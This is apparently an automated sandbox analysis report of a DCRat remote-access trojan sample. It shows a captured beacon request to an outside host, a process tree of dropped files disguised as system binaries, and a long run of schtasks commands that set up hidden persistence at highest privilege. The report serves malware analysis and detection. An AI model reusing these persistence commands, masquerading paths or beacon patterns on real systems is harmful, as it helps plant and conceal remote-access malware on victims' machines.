                            Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 
6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74
                            Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height
                            Aug 6, 2022 00:53:01.584369898 CEST | 1737 | OUT | GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
                            Accept: */*
                            Content-Type: text/csv
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                            Host: a0702220.xsph.ru
                            Aug 6, 2022 00:53:01.648134947 CEST | 1738 | IN | HTTP/1.1 403 Forbidden
                            Server: openresty
                            Date: Fri, 05 Aug 2022 22:53:01 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Vary: Accept-Encoding
                            Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 
6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74
                            Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height



                            Target ID:0
                            Start time:00:52:03
                            Start date:06/08/2022
                            Path:C:\Users\user\Desktop\cDouNOFXle.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\cDouNOFXle.exe"
                            Imagebase:0x60000
                            File size:1232540 bytes
                            MD5 hash:54172888B473F2515B13FE1E2032A112
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:1
                            Start time:00:52:05
                            Start date:06/08/2022
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
                            Imagebase:0x380000
                            File size:147456 bytes
                            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:4
                            Start time:00:52:08
                            Start date:06/08/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
                            Imagebase:0xc20000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:5
                            Start time:00:52:08
                            Start date:06/08/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c9170000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:6
                            Start time:00:52:08
                            Start date:06/08/2022
                            Path:C:\comproviderRuntimecommon\chainsavesref.exe
                            Wow64 process (32bit):false
                            Commandline:C:\comproviderRuntimecommon\chainsavesref.exe
                            Imagebase:0x350000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 70%, ReversingLabs
                            Reputation:low

                            Target ID:8
                            Start time:00:52:14
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:9
                            Start time:00:52:14
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73c930000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:10
                            Start time:00:52:15
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:11
                            Start time:00:52:16
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:12
                            Start time:00:52:16
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:14
                            Start time:00:52:16
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:16
                            Start time:00:52:17
                            Start date:06/08/2022
                            Path:C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
                            Imagebase:0x960000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 70%, ReversingLabs
                            Reputation:low

                            Target ID:17
                            Start time:00:52:17
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:19
                            Start time:00:52:17
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:20
                            Start time:00:52:18
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:21
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:22
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:23
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
                            Imagebase:0xcf0000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 55%, Virustotal
                            • Detection: 70%, ReversingLabs

                            Target ID:24
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:26
                            Start time:00:52:20
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\explorer.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:27
                            Start time:00:52:21
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:28
                            Start time:00:52:21
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:29
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:30
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Recovery\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Recovery\explorer.exe
                            Imagebase:0x100000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 55%, Virustotal
                            • Detection: 70%, ReversingLabs

                            Target ID:31
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:32
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Recovery\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Recovery\explorer.exe
                            Imagebase:0x2a0000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                            Target ID:33
                            Start time:00:52:23
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:35
                            Start time:00:52:24
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f
